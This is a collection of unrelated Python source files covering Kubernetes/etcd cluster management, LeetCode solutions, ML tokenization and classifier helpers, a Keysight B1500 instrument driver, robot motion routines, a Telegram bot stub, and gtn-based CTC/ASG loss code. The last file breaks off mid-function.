def node_status(self, nodename):
"""Returns the status of a Node.
Args:
nodename (str): The name of the node to check.
Returns:
The status of the node as string or None if an error was
encountered.
"""
resp = None
try:
resp = self.api.read_node_status(
nodename,
pretty=True)
LOGGER.debug("API Response: %s", resp)
except ApiException as exc:
LOGGER.debug("API exception: %s", exc)
return None
# Grab dat string
status = [x for x in resp.status.conditions if x.type == 'Ready']
return status[0].status
@retry(ValueError)
def etcd_members(self, podname, master_ip):
"""Retrieves a dictionary with information about the etcd cluster.
This function uses ``etcdctl member list`` to retrieve information
about the etcd cluster, then parses that response into a dictionary
where the keys are the names of the members and the corresponding values
hold the rest of the information such as ID, clientURLs and peerURLs.
Returns:
A dictionary with information about the etcd cluster.
Raises:
ValueError if master_ip is not valid.
"""
if not valid_ipv4(master_ip):
raise ValueError(f"Invalid IP: {master_ip}")
exec_command = ['/bin/sh', '-c', ETCDCTL_BASE.format(
"member list", master_ip)]
response = stream(self.api.connect_get_namespaced_pod_exec,
podname, 'kube-system',
command=exec_command,
stderr=True, stdin=False,
stdout=True, tty=False)
return parse_etcd_response(response)
@retry(ValueError)
def remove_from_etcd(self, name, ignore_not_found=True):
"""Removes a member from etcd.
The 'master-adder' operator will be used to perform the
queries against etcd. The pod will be created if not found.
Args:
name (str): The name of the member to remove.
ignore_not_found (bool): If set to False, will raise a
ValueError if member is not part of etcd cluster.
"""
master, master_ip = self.get_random_master()
podname = "etcd-%s" % master
etcd_members = self.etcd_members(podname, master_ip)
LOGGER.debug(etcd_members)
try:
etcd_id = etcd_members[name]['ID']
except KeyError:
msg = f"'{name}' not part of etcd cluster"
if ignore_not_found:
LOGGER.info("Skipping removing %s from etcd: %s", name, msg)
return
raise ValueError(msg)
exec_command = ['/bin/sh', '-c',
ETCDCTL_BASE.format("member remove %s" % etcd_id, master_ip)]
response = stream(self.api.connect_get_namespaced_pod_exec,
podname, 'kube-system',
command=exec_command,
stderr=True, stdin=False,
stdout=True, tty=False)
LOGGER.debug("%s", response)
LOGGER.debug("Removed '%s' from etcd", name)
class K8S(K8SConfigurator, K8SScaler): # pylint: disable=too-many-locals
"""Class allowing various interactions with a Kubernets cluster.
"""
def __init__(self, config, manifest_path=None):
"""
A class to configure k8s after boot
Args:
config (str): File path for the kubernetes configuration file
manfiest_path (str): Path for kubernetes manifests to be applied
"""
self.config = config
if not manifest_path:
manifest_path = MANIFESTSPATH
self.manifest_path = manifest_path
kube_config.load_kube_config(config_file=config)
config = Configuration()
self.api = k8sclient.CoreV1Api()
self.client = api_client.ApiClient(configuration=config)
@property
def nginx_ingress_ports(self):
"""
get the ingress-nginx service ports as dictionary
"""
ingress = self.api.list_namespaced_service(
'ingress-nginx',
label_selector="app.kubernetes.io/name=ingress-nginx",
limit=1)
return {i.name.upper(): i for i in ingress.items[0].spec.ports}
def get_addons(config):
"""
A prototype for loading addons. There are optional addons, and non-optional
addons.
Currently, non-optional addons include only the metrics-server.
Args:
config (dict): parse yaml with an optional section, list of addons
"""
for item in config.get('addons', {}):
yield KorisAddon(item)
for item in ['metrics-server', 'nginx-ingress', 'ext-cloud-openstack']:
yield KorisAddon(item)
class KorisAddon: # pylint: disable=too-few-public-methods
"""
Naive Addon class. Applies a kubernetes collection of resources from yml.
Args:
name (str): the name of the plugin
manifest_path (str): the path where kubernetes resources are saved.
"""
def __init__(self, name, manifest_path=MANIFESTSPATH):
self.name = name
self.file = os.path.join(manifest_path, name + ".yml")
def apply(self, k8s_client, apply_func=create_from_yaml):
"""
Apply a plugin to the cluster.
Currently we use the Python client to apply a plugin. This might be
limited, so we keep the possibilty to use a kubectl shell wrapper by
making this an optional argument.
Args:
k8s_client: A Kubernet API client
apply_func: A callable that can apply a plugin to the cluster
"""
apply_func(k8s_client, self.file, verbose=False)
def add_ingress_listeners(nginx_ingress_ports, lbinst, lb_masters):
"""
Reconfigure the Openstack LoadBalancer - add an HTTP and HTTPS listener
for nginx ingress controller
Args:
lbinst (:class:`.cloud.openstack.LoadBalancer`): A configured
LoadBalancer instance.
members (list): list containining memebr information
"""
# [{"name": "foo", "address": "10.0.0.38", "protocol_port": "6443"},
# {"name": "bar", "address": "10.0.0.29", "protocol_port": "6443"},
# ]
for key, port in {'Ingress-HTTP': 80, 'Ingress-HTTPS': 443}.items():
protocol = key.split("-")[-1]
name = '-'.join((key, lbinst.config['cluster-name']))
listener = lbinst.add_listener(
name=name,
protocol=protocol,
protocol_port=port)
pool = lbinst.add_pool(listener.id, protocol=protocol, name=name)
updated_masters = lb_masters.copy()
for master in updated_masters:
master['protocol_port'] = nginx_ingress_ports[protocol].node_port
master["monitor_port"] = nginx_ingress_ports[protocol].node_port
if not lbinst.bulk_update_members(updated_masters, pool['id']):
LOGGER.debug("Bulk update failed, falling back to serial update")
for master in lb_masters:
lbinst.add_member(pool.id, master['address'],
protocol_port=nginx_ingress_ports[protocol].node_port) # noqa
|
#!c:\users\shahe\courses\profiles-rest-api\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
"""
Given two words (beginWord and endWord), and a dictionary's word list, find the length of shortest transformation sequence from beginWord to endWord, such that:
Only one letter can be changed at a time.
Each transformed word must exist in the word list.
Note:
Return 0 if there is no such transformation sequence.
All words have the same length.
All words contain only lowercase alphabetic characters.
You may assume no duplicates in the word list.
You may assume beginWord and endWord are non-empty and are not the same.
Example 1:
Input:
beginWord = "hit",
endWord = "cog",
wordList = ["hot","dot","dog","lot","log","cog"]
Output: 5
Explanation: As one shortest transformation is "hit" -> "hot" -> "dot" -> "dog" -> "cog",
return its length 5.
Example 2:
Input:
beginWord = "hit"
endWord = "cog"
wordList = ["hot","dot","dog","lot","log"]
Output: 0
Explanation: The endWord "cog" is not in wordList, therefore no possible transformation.
"""
import collections
class Solution:
def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:
def find_neighbors(curr, wordList):
for index in range(len(curr)):
for ch in 'abcdefghijklmnopqrstuvwxyz':
nextWord = curr[:index] + ch + curr[index+1:]
if nextWord in wordList:
yield nextWord
wordList = set(wordList)
if beginWord in wordList:
wordList.remove(beginWord)
if endWord not in wordList:
return 0
queue = collections.deque([[beginWord, 1]])
visited = set()
while queue:
curr, step = queue.popleft()
if curr == endWord:
return step
if curr != beginWord and curr not in wordList:
continue
if curr != beginWord:
wordList.remove(curr)
for neighbor in find_neighbors(curr, wordList):
queue.append((neighbor, step + 1))
return 0 |
import sys
import pandas as pd
from keras.preprocessing.text import Tokenizer
TABELA = sys.argv[1]
SEQCOL = 'sequence'
LABCOL = 'class'
# Declare tokenizer
tkz_seq = Tokenizer(num_words = None, split = ' ', char_level = True, lower = True)
tkz_lab = Tokenizer()
# Read file
df = pd.read_csv(TABELA)
sequencias = df[SEQCOL]
categorias = df[LABCOL]
# Tokenize sequences
tkz_seq.fit_on_texts(sequencias)
x_seq_arrays = tkz_seq.texts_to_sequences(sequencias)
vocab_size_seq = len(tkz_seq.word_index) + 1
#print(tkz_seq.word_counts)
#print(tkz_seq.word_index)
#print(tkz_seq.word_docs)
#print(tkz_seq.document_count)
#print(vocab_size_seq)
# Tokenize labels
tkz_lab.fit_on_texts(categorias)
toklabs = tkz_lab.texts_to_sequences(categorias)
vocab_size_lab = len(tkz_lab.word_index) + 1
#print(tkz_lab.word_counts)
#print(tkz_lab.word_index)
#print(tkz_lab.word_docs)
#print(tkz_lab.document_count)
#print(vocab_size_lab)
|
'''
Author: ZHAO Zinan
Created: 30-Oct-2018
136. Single Number
https://leetcode.com/problems/single-number/description/
'''
class Solution:
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if len(nums):
result = nums[0]
for i in range(1, len(nums)):
result = result ^ nums[i]
return result
# test
if __name__ == '__main__':
solution = Solution()
print(solution.singleNumber([2, 1, 2]))
print(solution.singleNumber([1, 2, 1, 2, 3]))
|
#-*-coding=utf8-*-
import sklearn
from nltk.classify.scikitlearn import SklearnClassifier
from sklearn.svm import SVC, LinearSVC, NuSVC
from sklearn.naive_bayes import MultinomialNB, BernoulliNB
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
def buildClassifier_score(trainSet,devtestSet,classifier):
#print devtestSet
from nltk import compat
dev, tag_dev = zip(*devtestSet) #把开发测试集(已经经过特征化和赋予标签了)分为数据和标签
classifier = SklearnClassifier(classifier) #在nltk 中使用scikit-learn 的接口
#x,y in list(compat.izip(*trainSet))
classifier.train(trainSet) #训练分类器
#help('SklearnClassifier.batch_classify')
pred = classifier.classify_many(dev)#batch_classify(testSet) #对开发测试集的数据进行分类,给出预测的标签
return accuracy_score(tag_dev, pred) #对比分类预测结果和人工标注的正确结果,给出分类器准确度
def showEvalueResult(trainSet,devtestSet,classiferName,classiferFunc):
print classiferName +'`s accuracy is %f' %buildClassifier_score(trainSet,devtestSet,classiferFunc)
"""
BernoulliNB()
MultinomialNB()
LogisticRegression()
SVC()
LinearSVC()
NuSVC()
""" |
import re
from typing import Optional, Tuple, TYPE_CHECKING, Dict, Union, cast
from typing_extensions import TypedDict
from collections import namedtuple
import numpy as np
from qcodes import InstrumentChannel
from .message_builder import MessageBuilder
from . import constants
from .constants import ModuleKind, SlotNr, MeasurementStatus, ChannelName
if TYPE_CHECKING:
from .KeysightB1500_base import KeysightB1500
_FMTResponse = namedtuple('FMTResponse', 'value status channel type')
class MeasurementNotTaken(Exception):
pass
def fmt_response_base_parser(raw_data_val: str) -> _FMTResponse:
"""
Parse the response from SPA for `FMT 1,0` format into a named tuple
with names, value (value of the data), status (Normal or with compliance
error such as C, T, V), channel (channel number of the output data such
as CH1,CH2), type (current 'I' or voltage 'V'). This parser is tested
for FMT1,0 and FMT1,1 response.
Args:
raw_data_val: Unparsed (raw) data for the instrument.
"""
values_separator = ','
data_val = []
data_status = []
data_channel = []
data_datatype = []
for str_value in raw_data_val.split(values_separator):
status = str_value[0]
channel_id = constants.ChannelName[str_value[1]].value
datatype = str_value[2]
value = float(str_value[3:])
data_val.append(value)
data_status.append(status)
data_channel.append(channel_id)
data_datatype.append(datatype)
data = _FMTResponse(data_val, data_status, data_channel, data_datatype)
return data
def parse_module_query_response(response: str) -> Dict[SlotNr, str]:
"""
Extract installed module information from the given string and return the
information as a dictionary.
Args:
response: Response str to `UNT? 0` query.
Returns:
Dictionary from slot numbers to model name strings.
"""
pattern = r";?(?P<model>\w+),(?P<revision>\d+)"
moduleinfo = re.findall(pattern, response)
return {
SlotNr(slot_nr): model
for slot_nr, (model, rev) in enumerate(moduleinfo, start=1)
if model != "0"
}
# pattern to match dcv experiment
_pattern_lrn = re.compile(
r"(?P<status_dc>\w{1,3})(?P<chnr_dc>\w),(?P<voltage_dc>\d{1,3}.\d{1,4});"
r"(?P<status_ac>\w{1,3})(?P<chnr_ac>\w),(?P<voltage_ac>\d{1,3}.\d{1,4});"
r"(?P<status_fc>\w{1,2})(?P<chnr_fc>\w),(?P<frequency>\d{1,6}.\d{1,4})"
)
def parse_dcv_measurement_response(response: str) -> Dict[str, Union[str,
float]]:
"""
Extract status, channel number, value and accompanying metadata from
the string and return them as a dictionary.
Args:
response: Response str to lrn_query For the MFCMU.
"""
match = re.match(_pattern_lrn, response)
if match is None:
raise ValueError(f"{response!r} didn't match {_pattern_lrn!r} pattern")
dd = match.groupdict()
d = cast(Dict[str, Union[str, float]], dd)
return d
# Pattern to match the spot measurement response against
_pattern = re.compile(
r"((?P<status>\w)(?P<channel>\w)(?P<dtype>\w))?"
r"(?P<value>[+-]\d{1,3}\.\d{3,6}E[+-]\d{2})"
)
class SpotResponse(TypedDict):
value: float
status: MeasurementStatus
channel: ChannelName
dtype: str
def parse_spot_measurement_response(response: str) -> SpotResponse:
"""
Extract measured value and accompanying metadata from the string
and return them as a dictionary.
Args:
response: Response str to spot measurement query.
Returns:
Dictionary with measured value and associated metadata (e.g.
timestamp, channel number, etc.)
"""
match = re.match(_pattern, response)
if match is None:
raise ValueError(f"{response!r} didn't match {_pattern!r} pattern")
dd = match.groupdict()
d = SpotResponse(
value=_convert_to_nan_if_dummy_value(float(dd["value"])),
status=MeasurementStatus[dd["status"]],
channel=ChannelName[dd["channel"]],
dtype=dd["dtype"]
)
return d
_DCORRResponse = namedtuple('_DCORRResponse', 'mode primary secondary')
def parse_dcorr_query_response(response: str) -> _DCORRResponse:
"""
Parse string response of ``DCORR?`` `command into a named tuple of
:class:`constants.DCORR.Mode` and primary and secondary reference or
calibration values.
"""
mode, primary, secondary = response.split(',')
return _DCORRResponse(mode=constants.DCORR.Mode(int(mode)),
primary=float(primary),
secondary=float(secondary))
def fixed_negative_float(response: str) -> float:
"""
Keysight sometimes responds for ex. '-0.-1' as an output when you input
'-0.1'. This function can convert such strings also to float.
"""
if len(response.split('.')) > 2:
raise ValueError('String must of format `a` or `a.b`')
parts = response.split('.')
number = parts[0]
decimal = parts[1] if len(parts) > 1 else '0'
decimal = decimal.replace("-", "")
output = ".".join([number, decimal])
return float(output)
_dcorr_labels_units_map = {
constants.DCORR.Mode.Cp_G: dict(
primary=dict(label='Cp', unit='F'),
secondary=dict(label='G', unit='S')
),
constants.DCORR.Mode.Ls_Rs: dict(
primary=dict(label='Ls', unit='H'),
secondary=dict(label='Rs', unit='Ω'))
}
def format_dcorr_response(r: _DCORRResponse) -> str:
"""
Format a given response tuple ``_DCORRResponse`` from
``DCORR?`` command as a human-readable string.
"""
labels_units = _dcorr_labels_units_map[r.mode]
primary = labels_units['primary']
secondary = labels_units['secondary']
result_str = \
f"Mode: {r.mode.name}, " \
f"Primary {primary['label']}: {r.primary} {primary['unit']}, " \
f"Secondary {secondary['label']}: {r.secondary} {secondary['unit']}"
return result_str
def get_name_label_unit_of_impedance_model(
mode: constants.IMP.MeasurementMode
) -> Tuple[Tuple[str, str], Tuple[str, str], Tuple[str, str]]:
params = mode.name.split('_')
param1 = params[0]
param2 = '_'.join(params[1:])
label = (constants.IMP.Name[param1].value,
constants.IMP.Name[param2].value)
unit = (constants.IMP.Unit[param1].value,
constants.IMP.Unit[param2].value)
name = (label[0].lower().replace(' ', '_'),
label[1].lower().replace(' ', '_'))
return name, label, unit
# TODO notes:
# - [ ] Instead of generating a Qcodes InstrumentChannel for each **module**,
# it might make more sense to generate one for each **channel**
def get_measurement_summary(status_array: np.ndarray) -> str:
unique_error_statuses = np.unique(status_array[status_array != "N"])
if len(unique_error_statuses) > 0:
summary = " ".join(
constants.MeasurementStatus[err] for err in
unique_error_statuses
)
else:
summary = constants.MeasurementStatus["N"]
return summary
def convert_dummy_val_to_nan(param: _FMTResponse):
"""
Converts dummy value to NaN. Instrument may output dummy value (
199.999E+99) if measurement data is over the measurement range. Or the
sweep measurement was aborted by the automatic stop function or power
compliance. Or if any abort condition is detected. Dummy data
199.999E+99 will be returned for the data after abort."
Args:
param: This must be of type named tuple _FMTResponse.
"""
for index, value in enumerate(param.value):
param.value[index] = _convert_to_nan_if_dummy_value(param.value[index])
def _convert_to_nan_if_dummy_value(value: float) -> float:
return float('nan') if value > 1e99 else value
class B1500Module(InstrumentChannel):
"""Base class for all modules of B1500 Parameter Analyzer
When subclassing,
- set ``MODULE_KIND`` attribute to the correct module kind
:class:`~.constants.ModuleKind` that the module is.
- populate ``channels`` attribute according to the number of
channels that the module has.
Args:
parent: Mainframe B1500 instance that this module belongs to
name: Name of the instrument instance to create. If `None`
(Default), then the name is autogenerated from the instrument
class.
slot_nr: Slot number of this module (not channel number)
"""
MODULE_KIND: ModuleKind
def __init__(self, parent: 'KeysightB1500', name: Optional[str], slot_nr,
**kwargs):
# self.channels will be populated in the concrete module subclasses
# because channel count is module specific
self.channels: Tuple
self.slot_nr = SlotNr(slot_nr)
if name is None:
number = len(parent.by_kind[self.MODULE_KIND]) + 1
name = self.MODULE_KIND.lower() + str(number)
super().__init__(parent=parent, name=name, **kwargs)
# Response parsing functions as static methods for user convenience
parse_spot_measurement_response = parse_spot_measurement_response
parse_module_query_response = parse_module_query_response
def enable_outputs(self):
"""
Enables all outputs of this module by closing the output relays of its
channels.
"""
# TODO This always enables all outputs of a module, which is maybe not
# desirable. (Also check the TODO item at the top about
# InstrumentChannel per Channel instead of per Module.
msg = MessageBuilder().cn(self.channels).message
self.write(msg)
def disable_outputs(self):
"""
Disables all outputs of this module by opening the output relays of its
channels.
"""
# TODO See enable_output TODO item
msg = MessageBuilder().cl(self.channels).message
self.write(msg)
def is_enabled(self) -> bool:
"""
Check if channels of this module are enabled.
Returns:
`True` if *all* channels of this module are enabled. `False`,
otherwise.
"""
# TODO If a module has multiple channels, and only one is enabled, then
# this will return false, which is probably not desirable.
# Also check the TODO item at the top about InstrumentChannel per
# Channel instead of per Module.
msg = (MessageBuilder()
.lrn_query(constants.LRN.Type.OUTPUT_SWITCH)
.message
)
response = self.ask(msg)
activated_channels = re.sub(r"[^,\d]", "", response).split(",")
is_enabled = set(self.channels).issubset(
int(x) for x in activated_channels if x != ''
)
return is_enabled
def clear_timer_count(self) -> None:
"""
This command clears the timer count. This command is effective for
all measurement modes, regardless of the TSC setting. This command
is not effective for the 4 byte binary data output format
(FMT3 and FMT4).
"""
self.root_instrument.clear_timer_count(chnum=self.channels)
class StatusMixin:
def __init__(self) -> None:
self.param1 = _FMTResponse(None, None, None, None)
self.param2 = _FMTResponse(None, None, None, None)
self.names = tuple(['param1', 'param2'])
def status_summary(self) -> Dict[str, str]:
status_array_param1 = self.param1.status
status_array_param2 = self.param2.status
if status_array_param1 is None:
raise MeasurementNotTaken("First run_sweep to generate the data")
summary_param1 = get_measurement_summary(status_array_param1)
summary_param2 = get_measurement_summary(status_array_param2)
return_dict = {self.names[0]: summary_param1,
self.names[1]: summary_param2}
return return_dict
|
import numpy as np
import sys
sys.path.append(".")
from ai.action.movement.movements.basic import *
from ai.action.movement.movements.poweron import *
import ai.actionplanner
def main(mars, times=5):
rub_object(mars, times)
def rub_object(mars, times):
for i in range(times):
rand_speed_1 = get_rand_speed(0.3, 0.5)
mars.setHeadAngle(2, get_rand_angle(25), get_rand_speed(0.1, 0.3))
mars.setHeadAngle(1, get_rand_angle(-25), get_rand_speed(0.1, 0.3))
mars.setLegAngle(1, 1, 0, rand_speed_1)
mars.setLegAngle(2, 1, -10, rand_speed_1)
mars.setLegAngle(1, 2, -30, rand_speed_1)
mars.setLegAngle(2, 2, 10, rand_speed_1)
mars.setLegAngle(1, 3, 80, rand_speed_1)
mars.setLegAngle(2, 3, 10, rand_speed_1)
mars.setLegAngle(3, 1, 15, rand_speed_1)
mars.setLegAngle(3, 2, 20, rand_speed_1)
mars.setLegAngle(3, 3, -80, rand_speed_1)
mars.setLegAngle(4, 1, -15, rand_speed_1)
mars.setLegAngle(4, 2, 20, rand_speed_1)
mars.setLegAngle(4, 3, -70, rand_speed_1)
ai.actionplanner.ActionPlanner.sleep(2)
rand_speed_2 = get_rand_speed(0.3, 0.5)
mars.setHeadAngle(2, get_rand_angle(0), get_rand_speed(0.1, 0.3))
mars.setHeadAngle(1, get_rand_angle(25), get_rand_speed(0.1, 0.3))
mars.setLegAngle(1, 1, int(np.random.uniform(15, 21)), rand_speed_2)
mars.setLegAngle(2, 1, 0, rand_speed_2)
mars.setLegAngle(1, 2, int(np.random.uniform(10, 15)), rand_speed_2)
mars.setLegAngle(2, 2, 20, rand_speed_2)
mars.setLegAngle(1, 3, int(np.random.uniform(10, 15)), rand_speed_2)
mars.setLegAngle(2, 3, 20, rand_speed_2)
mars.setLegAngle(3, 1, 0, rand_speed_2)
mars.setLegAngle(3, 2, 40, rand_speed_2)
mars.setLegAngle(3, 3, -40, rand_speed_2)
mars.setLegAngle(4, 1, 15, rand_speed_2)
mars.setLegAngle(4, 2, 40, rand_speed_2)
mars.setLegAngle(4, 3, -40, rand_speed_2)
ai.actionplanner.ActionPlanner.sleep(2)
|
from sanic import Sanic, response
from app.bot import bot_register
# https://api.telegram.org/bot{your_bot_token}/setWebhook?url={your_vercel_domain_url}/api/bot
app = Sanic(__name__)
@app.route("/api/bot", strict_slashes=False)
async def bot(request):
return response.text("This endpoint is meant for bot and telegram communication.")
# TODO: It's working perfectly or not?
# Register bot as Serverless
bot_register(True)
if __name__ == "__main__":
app.run(debug=True, auto_reload=True, host="0.0.0.0", port=3000)
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
import collections
from dataclasses import dataclass
import gtn
import importlib
import logging
import numpy as np
import os
import struct
import sys
import time
import torch
def data_loader(dataset, config, world_rank=0, world_size=1):
num_samples = config["data"].get("num_samples", None)
if num_samples is not None:
logging.info(f"Using {num_samples} of {len(dataset)}.")
dataset = Subset(dataset, torch.randperm(len(dataset))[:num_samples])
return torch.utils.data.DataLoader(
dataset,
batch_sampler=BatchSortedSampler(
dataset, config["optim"]["batch_size"], world_rank, world_size
),
collate_fn=padding_collate,
num_workers=int(world_size > 1),
)
def module_from_file(module_name, file_path):
spec = importlib.util.spec_from_file_location(module_name, file_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
sys.modules[module_name] = module
return module
class Subset(torch.utils.data.Subset):
def __init__(self, dataset, indices):
super(Subset, self).__init__(dataset, indices)
def sample_sizes(self):
"""
Returns a list of tuples containing the input size
(width, height) and the output length for each sample.
"""
sizes = list(self.dataset.sample_sizes())
for idx in self.indices:
yield sizes[idx]
class BatchSortedSampler(torch.utils.data.Sampler):
def __init__(self, dataset, batch_size, world_rank, world_size, shuffle=True):
local_batchsize = batch_size // world_size
widths = (in_size[0] for in_size, _ in dataset.sample_sizes())
sorted_dataset = sorted(enumerate(widths), key=lambda x: x[1])
sorted_indices, _ = zip(*sorted_dataset)
global_batches = [
sorted_indices[idx : idx + local_batchsize]
for idx in range(0, len(sorted_indices), local_batchsize)
]
self.length = len(global_batches) // world_size
# distribute the sample across the ranks
self.batches = [
global_batches[world_rank + i * world_size] for i in range(self.length)
]
self.shuffle = shuffle
def __iter__(self):
order = torch.randperm if self.shuffle else torch.arange
return (self.batches[i] for i in order(self.length))
def __len__(self):
return self.length
def padding_collate(samples):
inputs, targets = zip(*samples)
# collate inputs:
h = inputs[0].shape[1]
max_input_len = max(ip.shape[2] for ip in inputs)
batch_inputs = torch.zeros((len(inputs), inputs[0].shape[1], max_input_len))
for e, ip in enumerate(inputs):
batch_inputs[e, :, : ip.shape[2]] = ip
return batch_inputs, targets
@dataclass
class Meters:
loss = 0.0
num_samples = 0
num_tokens = 0
edit_distance_tokens = 0
num_words = 0
edit_distance_words = 0
def sync(self):
lst = [self.loss, self.num_samples, self.num_tokens, self.edit_distance_tokens, self.num_words, self.edit_distance_words]
# TODO: avoid this so that distributed cpu training also works
lst_tensor = torch.FloatTensor(lst).cuda()
torch.distributed.all_reduce(lst_tensor)
(
self.loss,
self.num_samples,
self.num_tokens,
self.edit_distance_tokens,
self.num_words,
self.edit_distance_words
) = lst_tensor.tolist()
@property
def avg_loss(self):
return self.loss / self.num_samples if self.num_samples > 0 else 0
@property
def cer(self):
return self.edit_distance_tokens * 100.0 / self.num_tokens if self.num_tokens > 0 else 0
@property
def wer(self):
return self.edit_distance_words * 100.0 / self.num_words if self.num_words > 0 else 0
# A simple timer class inspired from `tnt.TimeMeter`
class CudaTimer:
def __init__(self, keys):
self.keys = keys
self.reset()
def start(self, key):
s = torch.cuda.Event(enable_timing=True)
s.record()
self.start_events[key].append(s)
return self
def stop(self, key):
e = torch.cuda.Event(enable_timing=True)
e.record()
self.end_events[key].append(e)
return self
def reset(self):
self.start_events = collections.defaultdict(list)
self.end_events = collections.defaultdict(list)
self.running_times = collections.defaultdict(float)
self.n = collections.defaultdict(int)
return self
def value(self):
self._synchronize()
return {k: self.running_times[k] / self.n[k] for k in self.keys}
def _synchronize(self):
torch.cuda.synchronize()
for k in self.keys:
starts = self.start_events[k]
ends = self.end_events[k]
if len(starts) == 0:
raise ValueError("Trying to divide by zero in TimeMeter")
if len(ends) != len(starts):
raise ValueError("Call stop before checking value!")
time = 0
for start, end in zip(starts, ends):
time += start.elapsed_time(end)
self.running_times[k] += time * 1e-3
self.n[k] += len(starts)
self.start_events = collections.defaultdict(list)
self.end_events = collections.defaultdict(list)
def pack_replabels(tokens, num_replabels):
if all(isinstance(t, list) for t in tokens):
return [pack_replabels(t, num_replabels) for t in tokens]
assert isinstance(tokens, list)
new_tokens = []
L = len(tokens)
num = 0
prev_token = -1
for token in tokens:
if token == prev_token and num < num_replabels:
num += 1
else:
if num > 0:
new_tokens.append(num - 1)
num = 0
new_tokens.append(token + num_replabels)
prev_token = token
if num > 0:
new_tokens.append(num - 1)
return new_tokens
def unpack_replabels(tokens, num_replabels):
if all(isinstance(t, list) for t in tokens):
return [unpack_replabels(t, num_replabels) for t in tokens]
assert isinstance(tokens, list)
new_tokens = []
prev_token = -1
for token in tokens:
if token >= num_replabels:
new_tokens.append(token - num_replabels)
prev_token = token
elif prev_token != -1:
for i in range(token + 1):
new_tokens.append(prev_token - num_replabels)
prev_token = -1
return new_tokens
# Used to measure the time taken for multiple events
class Timer:
def __init__(self, keys):
self.keys = keys
self.n = {}
self.running_time = {}
self.total_time = {}
self.reset()
def start(self, key):
self.running_time[key] = time.time()
return self
def stop(self, key):
self.total_time[key] = time.time() - self.running_time[key]
self.n[key] += 1
self.running_time[key] = None
return self
def reset(self):
for k in self.keys:
self.total_time[k] = 0
self.running_time[k] = None
self.n[k] = 0
return self
def value(self):
vals = {}
for k in self.keys:
if self.n[k] == 0:
raise ValueError("Trying to divide by zero in TimeMeter")
else:
vals[k] = self.total_time[k] / self.n[k]
return vals
class CTCLossFunction(torch.autograd.Function):
@staticmethod
def create_ctc_graph(target, blank_idx):
g_criterion = gtn.Graph(False)
L = len(target)
S = 2 * L + 1
for l in range(S):
idx = (l - 1) // 2
g_criterion.add_node(l == 0, l == S - 1 or l == S - 2)
label = target[idx] if l % 2 else blank_idx
g_criterion.add_arc(l, l, label)
if l > 0:
g_criterion.add_arc(l - 1, l, label)
if l % 2 and l > 1 and label != target[idx - 1]:
g_criterion.add_arc(l - 2, l, label)
g_criterion.arc_sort(False)
return g_criterion
@staticmethod
def forward(ctx, log_probs, targets, blank_idx=0, reduction="none"):
B, T, C = log_probs.shape
losses = [None] * B
scales = [None] * B
emissions_graphs = [None] * B
def process(b):
# create emission graph
g_emissions = gtn.linear_graph(T, C, log_probs.requires_grad)
cpu_data = log_probs[b].cpu().contiguous()
g_emissions.set_weights(cpu_data.data_ptr())
# create criterion graph
g_criterion = CTCLossFunction.create_ctc_graph(targets[b], blank_idx)
# compose the graphs
g_loss = gtn.negate(
gtn.forward_score(gtn.intersect(g_emissions, g_criterion))
)
scale = 1.0
if reduction == "mean":
L = len(targets[b])
scale = 1.0 / L if L > 0 else scale
elif reduction != "none":
raise ValueError("invalid value for reduction '" + str(reduction) + "'")
# Save for backward:
losses[b] = g_loss
scales[b] = scale
emissions_graphs[b] = g_emissions
gtn.parallel_for(process, range(B))
ctx.auxiliary_data = (losses, scales, emissions_graphs, log_probs.shape)
loss = torch.tensor([losses[b].item() * scales[b] for b in range(B)])
return torch.mean(loss.cuda() if log_probs.is_cuda else loss)
@staticmethod
def backward(ctx, grad_output):
losses, scales, emissions_graphs, in_shape = ctx.auxiliary_data
B, T, C = in_shape
input_grad = torch.empty((B, T, C))
def process(b):
gtn.backward(losses[b], False)
emissions = emissions_graphs[b]
grad = emissions.grad().weights_to_numpy()
input_grad[b] = torch.from_numpy(grad).view(1, T, C) * scales[b]
gtn.parallel_for(process, range(B))
if grad_output.is_cuda:
input_grad = input_grad.cuda()
input_grad *= grad_output / B
return (
input_grad,
None, # targets
None, # blank_idx
None, # reduction
)
CTCLoss = CTCLossFunction.apply
class ASGLossFunction(torch.autograd.Function):
@staticmethod
def create_transitions_graph(transitions, calc_grad=False):
num_classes = transitions.shape[1]
assert transitions.shape == (num_classes + 1, num_classes)
g_transitions = gtn.Graph(calc_grad)
g_transitions.add_node(True)
for i in range(1, num_classes + 1):
g_transitions.add_node(False, True)
g_transitions.add_arc(0, i, i - 1) # p(i | <s>)
for i in range(num_classes):
for j in range(num_classes):
g_transitions.add_arc(j + 1, i + 1, i) # p(i | j)
cpu_data = transitions.cpu().contiguous()
g_transitions.set_weights(cpu_data.data_ptr())
g_transitions.mark_arc_sorted(False)
g_transitions.mark_arc_sorted(True)
return g_transitions
@staticmethod
def create_force_align_graph(target):
g_fal = gtn.Graph(False)
L = len(target)
g_fal.add_node(True)
for l in range(1, L + 1):
g_fal.add_node(False, l == L)
g_fal.add_arc(l - 1, l, target[l - 1])
g_fal.add_arc(l, l, target[l - 1])
g_fal.arc_sort(True)
return g_fal
@staticmethod
def forward(ctx, inputs, transitions, targets, reduction="none"):
B, T, C = inputs.shape
losses = [None] * B
scales = [None] * B
emissions_graphs = [None] * B
transitions_graphs = [None] * B
calc_trans_grad = transitions.requires_grad
transitions = transitions.cpu() # avoid multiple cuda -> cpu copies
def process(b):
# create emission graph
g_emissions = gtn.linear_graph(T, C, inputs.requires_grad)
cpu_data = inputs[b].cpu().contiguous()
g_emissions.set_weights(cpu_data.data_ptr())
# create transition graph
g_transitions = ASGLossFunction.create_transitions_graph(
transitions, calc_trans_grad
)
# create force align criterion graph
g_fal = ASGLossFunction.create_force_align_graph(targets[b])
# compose the graphs
g_fal_fwd = gtn.forward_score(
gtn.intersect(gtn.intersect(g_fal, g_transitions), g_emissions)
)
g_fcc_fwd = gtn.forward_score(gtn.intersect(g_emissions, g_transitions))
g_loss = gtn.subtract(g_fcc_fwd, g_fal_fwd)
scale = 1.0
if reduction == "mean":
L = len(targets[b])
scale = 1.0 / L if L > 0 else scale
elif reduction != "none":
raise ValueError("invalid value for reduction '" + str(reduction) + "'")
# Save for backward:
losses[b] = g_loss
scales[b] = scale
